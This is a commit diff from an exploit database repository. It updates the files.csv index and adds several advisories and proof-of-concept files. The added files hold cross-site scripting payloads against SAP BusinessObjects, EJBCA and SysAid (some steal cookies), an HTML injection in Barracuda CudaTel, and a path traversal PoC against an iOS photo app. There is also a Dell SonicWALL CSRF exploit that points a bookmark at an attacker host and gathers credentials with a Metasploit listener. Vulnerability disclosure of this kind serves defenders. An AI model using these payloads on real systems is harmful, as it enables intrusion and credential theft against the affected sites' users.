DB: 2015-05-08
19 new exploits
parent
b2d25f8fa5
commit
01ba689949
27 changed files with 1185 additions and 21 deletions
32
files.csv
32
files.csv
|
@ -12648,7 +12648,7 @@ id,file,description,date,author,platform,type,port
|
|||
14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - MKD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdisk,windows,remote,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - CWD Command Remote Buffer Overflow Exploit (Post Auth)",2010-07-18,fdiskyou,windows,remote,0
|
||||
14403,platforms/windows/local/14403.txt,"Microsoft Windows Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
|
||||
14406,platforms/bsd/local/14406.pl,"GhostScript PostScript File Stack Overflow Exploit",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
|
||||
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd Remote Format String Exploit",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
|
||||
|
@ -12718,7 +12718,7 @@ id,file,description,date,author,platform,type,port
|
|||
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0
|
||||
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 - Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0
|
||||
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
|
||||
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0
|
||||
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
|
||||
14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2010-07-28,mywisdom,unix,remote,0
|
||||
14490,platforms/php/webapps/14490.txt,"nuBuilder Remote File inclusion Vulnerability",2010-07-28,Ahlspiess,php,webapps,0
|
||||
|
@ -12813,7 +12813,7 @@ id,file,description,date,author,platform,type,port
|
|||
14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0
|
||||
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service Vulnerability",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdisk,php,webapps,0
|
||||
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability",2010-08-11,fdiskyou,php,webapps,0
|
||||
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Multiple Commands Remote Buffer Overflow Exploit (Post Auth)",2010-08-11,"Glafkos Charalambous ",windows,remote,21
|
||||
14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
|
@ -12833,7 +12833,7 @@ id,file,description,date,author,platform,type,port
|
|||
14643,platforms/php/webapps/14643.txt,"sFileManager <= 24a - Local File Inclusion Vulnerability",2010-08-14,Pepelux,php,webapps,0
|
||||
14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple CSRF Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0
|
||||
14645,platforms/php/webapps/14645.txt,"Sports Accelerator Suite 2.0 - (news_id) Remote SQL Injection Vulnerability",2010-08-14,LiquidWorm,php,webapps,0
|
||||
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdisk,windows,dos,0
|
||||
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities PoC",2010-08-14,fdiskyou,windows,dos,0
|
||||
14647,platforms/php/webapps/14647.php,"PHP-Fusion Local File Inclusion Vulnerability",2010-08-15,MoDaMeR,php,webapps,0
|
||||
14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0
|
||||
14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0
|
||||
|
@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port
|
|||
15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0
|
||||
15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0
|
||||
15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0
|
||||
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdisk,windows,local,0
|
||||
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
|
||||
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
|
||||
15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
|
||||
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
|
||||
|
@ -15070,9 +15070,9 @@ id,file,description,date,author,platform,type,port
|
|||
17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0
|
||||
17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection Vulnerability",2011-05-28,M.Jock3R,php,webapps,0
|
||||
17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0
|
||||
17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdisk,windows,remote,0
|
||||
17345,platforms/windows/remote/17345.py,"HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)",2011-05-29,fdiskyou,windows,remote,0
|
||||
17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller Local File Inclusion Vulnerability",2011-05-28,Valentin,php,webapps,0
|
||||
17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdisk,windows,remote,0
|
||||
17339,platforms/windows/remote/17339.py,"HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)",2011-05-28,fdiskyou,windows,remote,0
|
||||
17341,platforms/php/webapps/17341.txt,"Joomla Component com_joomnik SQL Injection Vulnerability",2011-05-29,SOLVER,php,webapps,0
|
||||
17343,platforms/php/webapps/17343.txt,"Puzzle Apps CMS 3.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0
|
||||
17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - LFI Vulnerability",2011-05-29,"Treasure Priyamal",php,webapps,0
|
||||
|
@ -33311,3 +33311,21 @@ id,file,description,date,author,platform,type,port
|
|||
36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0
|
||||
36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0
|
||||
36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
|
||||
36926,platforms/php/webapps/36926.txt,"LeKommerce 'id' Parameter SQL Injection Vulnerability",2012-03-08,Mazt0r,php,webapps,0
|
||||
36927,platforms/php/webapps/36927.txt,"ToendaCMS 1.6.2 setup/index.php site Parameter Traversal Local File Inclusion",2012-03-08,AkaStep,php,webapps,0
|
||||
36928,platforms/windows/local/36928.py,"Macro Toolworks 7.5 Local Buffer Overflow Vulnerability",2012-03-08,"Julien Ahrens",windows,local,0
|
||||
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
|
||||
36930,platforms/multiple/webapps/36930.txt,"Wordpress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
|
||||
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
|
||||
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
|
||||
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
|
||||
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
|
||||
36937,platforms/php/webapps/36937.html,"phpMyVisites 2.4 phpmv2/index.php Multiple Cross Site Scripting Vulnerabilities",2012-03-09,AkaStep,php,webapps,0
|
||||
36938,platforms/php/webapps/36938.txt,"singapore 0.10.1 'gallery' Parameter Cross Site Scripting Vulnerability",2012-03-11,T0xic,php,webapps,0
|
||||
36939,platforms/java/webapps/36939.txt,"EJBCA 4.0.7 'issuer' Parameter Cross Site Scripting Vulnerability",2012-03-11,MustLive,java,webapps,0
|
||||
36940,platforms/cgi/webapps/36940.txt,"Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery",2015-05-07,"Veit Hailperin",cgi,webapps,443
|
||||
36941,platforms/xml/webapps/36941.txt,"IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability",2015-05-07,"Filippo Roncari",xml,webapps,0
|
||||
36942,platforms/php/webapps/36942.txt,"WordPress Freshmail Plugin <= 1.5.8 - (shortcode.php) SQL Injection",2015-05-07,"Felipe Molina",php,webapps,80
|
||||
36943,platforms/ios/webapps/36943.txt,"Album Streamer 2.0 iOS - Directory Traversal Vulnerability",2015-05-07,Vulnerability-Lab,ios,webapps,0
|
||||
|
|
|
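--- a/platforms/asp/webapps/36934.txt
+++ b/platforms/asp/webapps/36934.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/52361/info
+
+SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+SAP Business Objects XI R2 is vulnerable; other versions may be affected.
+
+http://www.example.com/businessobjects/enterprise115/InfoView/listing.aspx
+searchText=</script><script>alert(1);</script>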
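--- a/platforms/asp/webapps/36935.txt
+++ b/platforms/asp/webapps/36935.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52361/info
+
+SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+SAP Business Objects XI R2 is vulnerable; other versions may be affected.
+
+https://www.example.com/businessobjects/enterprise115/infoview/help/helpredir.aspx?guide='+alert('XSS 1')+'&lang=en&rpcontext='+alert('XSS 2')+'#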
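--- a/platforms/asp/webapps/36936.txt
+++ b/platforms/asp/webapps/36936.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52361/info
+
+SAP Business Objects is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+SAP Business Objects XI R2 is vulnerable; other versions may be affected.
+
+https://www.example.com/businessobjects/enterprise115/infoview/webi/webi_modify.aspx?id='+alert('XSS')+'#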
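--- a/platforms/cgi/webapps/36940.txt
+++ b/platforms/cgi/webapps/36940.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
+# Date: 04/28/2015
+# Exploit Author: Veit Hailperin
+# Vendor Homepage: www.dell.com
+# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
+# CVE : 2015-2248
+
+Exploitation Procedure (Outline):
+1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
+2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
+3. Gather the credentials on the target server provided in step #1
+
+1. Create a bookmark:
+
+<html>
+<body>
+<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
+<input type="hidden" name="bmName" value="foo" />
+<input type="hidden" name="host" value="www.malicious-host.tld" />
+<input type="hidden" name="description" value="bar" />
+<input type="hidden" name="tabs" value="Baz" />
+<input type="hidden" name="service" value="HTTP" />
+<input type="hidden" name="fbaSSOEnabled" value="on" />
+<input type="hidden" name="fbaSSOFormUserName" value="user" />
+<input type="hidden" name="fbaSSOFormUserPassword" value="password" />
+<input type="hidden" name="MC_App" value="inherit" />
+<input type="hidden" name="MC_Copy" value="inherit" />
+<input type="hidden" name="MC_Print" value="inherit" />
+<input type="hidden" name="MC_Offline" value="inherit" />
+<input type="hidden" name="name" value="name" />
+<input type="hidden" name="type" value="type" />
+<input type="hidden" name="owner" value="owner" />
+<input type="hidden" name="cmd" value="add" />
+<input type="hidden" name="wantBmData" value="true" />
+<input type="hidden" name="ok" value="OK" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+2. Call the newly created bookmark
+This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.
+
+<html>
+<body>
+<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
+<input type="hidden" name="HOST" value="www.malicious-host.tld" />
+<input type="hidden" name="bookmarkAccessed" value="4" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+
+3. Set up a listener
+E.g. metasploit payload
+use auxiliary/server/capture/http_basic
+
+msf auxiliary(http_basic) >
+[*] Listening on 0.0.0.0:80...
+[*] Using URL: http://0.0.0.0:80/
+[*] Local IP: http://www.malicious-host.tld:80/
+[*] Server started.
+[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
+[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"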
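--- a/platforms/hardware/remote/36931.txt
+++ b/platforms/hardware/remote/36931.txt
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/52358/info
+
+Barracuda CudaTel Communication Server is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
+
+Barracuda CudaTel Communication Server 2.0.029.1 is vulnerable; other versions may also be affected.
+
+<td class="detailTD">
+<div style="float: left;" class="printedName">
+"><iframe div="" <="" onload='alert("VL")' src="a">
+</td><script type="text/javascript">extensions_register('extOp530748', 'extOp530748-ext144',
+{"flag_super":"0","flag_locked":
+"0","bbx_extension_rcd":"2012-02-16
+11:21:48.105901","bbx_extension_block_begin":"2088","map"{"bbx_conference_id":null,"bbx_provider_gateway_id":null,"sort_name":
+"\"><iframe src=a onload=alert(\"vl\")
+<","bbx_valet_parking_id":null,"bbx_extension_entity_map_id":"82","bbx_extension_entity_
+map_fallback_exten":null,"bbx_
+extension_entity_map_metadata":null,"bbx_user_id":null,"bbx_router_id":"20","bbx_group_id":null,"bbx_callflow_id":null,"_force_
+row_refresh":"0","show_name":"\"><[EXECUTION OF PERSISTENT SCRIPT CODE]
+<","bbx_queue_id":null,"bbx_tdm_card_port_id":null,"flag_standalone":"1","bbx_auto_attendant_id":null,"bbx_extension_id_
+forward":null},"bbx_extension_name":null,"bbx_domain_id":"6","bbx_extension_block_end":"2088","type_id":
+
+{"id":"20","type":"router","col":"bbx_router_id"},"map_id":"82","flag_external":"0","flag_voicemail":"0","bbx_extension_value"
+:"2088","ldap":0,"bbx_extension_rpd":"2012-02-16 11:21:49.06783","user_synced":null,"printed_name":"\"><[EXECUTION OF
+PERSISTENT SCRIPT CODE]
+<","bbx_extension_id":"144","group_synced":null,"type":"router","flag_auto_provision":"0"});</script>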
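--- a/platforms/ios/webapps/36943.txt
+++ b/platforms/ios/webapps/36943.txt
@@ -0,0 +1,204 @@
+Document Title:
+===============
+Album Streamer v2.0 iOS - Directory Traversal Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1481
+
+
+Release Date:
+=============
+2015-05-07
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1481
+
+
+Common Vulnerability Scoring System:
+====================================
+6.6
+
+
+Product & Service Introduction:
+===============================
+1 Tap - Quick, Album Streamer, best Photo/Video Transfer app ever! Quick way to share your Album Photos and
+Videos to your computer. It takes only single tap to stream and download all/selected photos or videos.
+You can even view or play slide show of all your photos directly on the computer without downloading.
+
+(Copy of the Homepage: https://itunes.apple.com/DE/app/id835284235 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a directory traversal web vulnerability in the official Album Streamer v2.0 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-05-07: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Spider Talk
+Product: Album Streamer - iOS Mobile Web Application (Wifi) 2.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A Path Traveral web vulnerability has been discovered in the official Album Streamer v2.0 iOS mobile web-application.
+The security vulnerability allows a remote attacker to unauthorized request system path variables to compromise the
+mobile application or apple iOS device.
+
+The vulnerability is located in the `id` request to the `path` value of the photoDownload module. The vulnerability can be exploited by
+local or remote attackers without user interaction. The attacker needs to replace the picture assets id path request of the photoDownload
+module with a malicious payload like ./etc/passwd ./etc/hosts. The attack vector is located on the application-side of the service and
+the request method to execute is GET (client-side).
+
+The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
+Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
+Successful exploitation of the vulnerability results in mobile application compromise
+
+Request Method(s):
+[+] GET
+
+Vulnerable Module(s):
+[+] photoDownload
+
+Vulnerable Parameter(s):
+[+] id
+
+Affected Module(s):
+[+] photoDownload Item Index
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+
+PoC: http://localhost/photoDownload?id=[DIRECTORY TRAVERSAL]../../../../../../../etc
+
+
+Vulnerable Source(s): localhost/photoDownload
+<div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id0" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id0" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id0">asset.JPG</a></div></div><div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id1" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id1" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id1">asset.PNG</a></div></div>
+
+<!-- PREVIEW SECTION -->
+<div style="display: none;" id="overlay"></div>
+
+<div style="display: none;" id="popupBox">
+<div style="display: none;" id="popupContent">
+<img class="previewLoadingImage" id="previewLoading" src="/loading.gif">
+
+<img class="previewImage" src="/photoDownload?id=id1">
+
+<img src="/imgAlbumStreamPrev.png" class="btnShowPrev" height="25px" width="25px">
+
+<img src="/imgAlbumStreamNext.png" class="btnShowNext" height="25px" width="25px">
+
+</div>
+</div>
+
+<!-- BREAK -->
+<div class="sectionBreak"> </div>
+
+<!-- VIDEOS SECTION -->
+<div>
+<h1>
+<input class="videoAllCheckBox" id="videoAllCheckBox" type="checkbox"> Videos
+<input class="btnVideoDownload" value="Download (Selected)" type="button">
+</h1>
+</div>
+
+--- Poc Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost/photoDownload?id=../../../../etc Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[25568] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Connection[keep-alive]
+Response Header:
+Accept-Ranges[bytes]
+Content-Length[25568]
+Content-Disposition[: attachment; filename=asset.JPG]
+Date[Thu, 30 Apr 2015 13:29:14 GMT]
+
+
+
+Reference(s):
+http://localhost/
+http://localhost/photoDownload
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse of the id value in the photoDownload module.
+Restrict the input and disallow special chars to prevent further path traversal attacks.
+implement a whitelist to request only authroized urls through the mobile app api.
+
+
+Security Risk:
+==============
+The security risk of the directory traversal vulnerability in the wifi interface is estimated as high. (CVSS 6.6)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+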
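--- a/platforms/java/webapps/36939.txt
+++ b/platforms/java/webapps/36939.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52400/info
+
+EJBCA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+EJBCA 4.0.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/ejbca/publicweb/webdist/certdist?cmd=revoked&issuer=%3Cscript%3Ealert(document.cookie)%3C/script%3E&serno=1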
70
platforms/jsp/webapps/36929.txt
Executable file
70
platforms/jsp/webapps/36929.txt
Executable file
|
@ -0,0 +1,70 @@
|
|||
source: http://www.securityfocus.com/bid/52356/info
|
||||
|
||||
Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected.
|
||||
|
||||
HTML injection:
|
||||
<tablewidth="100%"cellspacing="5"cellpadding="5"border="0"class="Maxed">
|
||||
<tbody><trvalign="top"><tdwidth="50%"style="padding:10px;"id="Container_1"><tableclass="MaxedContainerContainer_1">
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header">
|
||||
<table>
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header_First">
|
||||
<tdclass="Container_Header_Center">
|
||||
Administratorsonline
|
||||
</td><tdclass="Container_Header_Last">
|
||||
</td>
|
||||
|
||||
</tr>
|
||||
</tbody></table></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<tdclass="Container_Body">
|
||||
<divclass="BorderFix_FFForm_Ctrl_Label">
|
||||
<br/>
|
||||
1Users<br/>
|
||||
JulienAhrens<EXCUTES PERSISTENT SCRIPt CODE HERE!></div></td></tr></tbody></table></td></tr></tbody>
|
||||
</table></div></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></body></html>
|
||||
|
||||
|
||||
|
||||
Cross-site scripting:
|
||||
|
||||
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName=<script>alert(document.cookie)</script>
|
||||
|
||||
or base64 encoded:
|
||||
http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName= ()
|
||||
BASE64@PHNjcmlwdD5hb
|
||||
GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4=
|
||||
|
||||
|
||||
|
||||
Non-persistent(listViewName):
|
||||
|
||||
<tdcolspan="6"class="Frame_Body_Center">
|
||||
<tablewidth="100%"border="0"class="Maxed">
|
||||
|
||||
<tbody><trvalign="top">
|
||||
<tdstyle="padding:10px;"id="Conainer_1">
|
||||
<tablewidth=""cellspacing="0"cellpadding="0"border="0">
|
||||
<tbody><tr>
|
||||
<td>
|
||||
<tablewidth="100%"cellspacing="0"cellpadding="0"border="0"class="MaxedContainerContainer_1">
|
||||
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header">
|
||||
|
||||
<table>
|
||||
<tbody><tr>
|
||||
<tdclass="Container_Header_First"/>
|
||||
<tdclass="Container_Header_Center">
|
||||
<palign="center"style="font-size:16px;">Customizelist-Assets-<EXCUTES PERSISTENT SCRIPt CODE HERE>
|
||||
|
||||
</p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr>
|
||||
</tbody></table></td></tr></tbody></table></form></body></html>
|
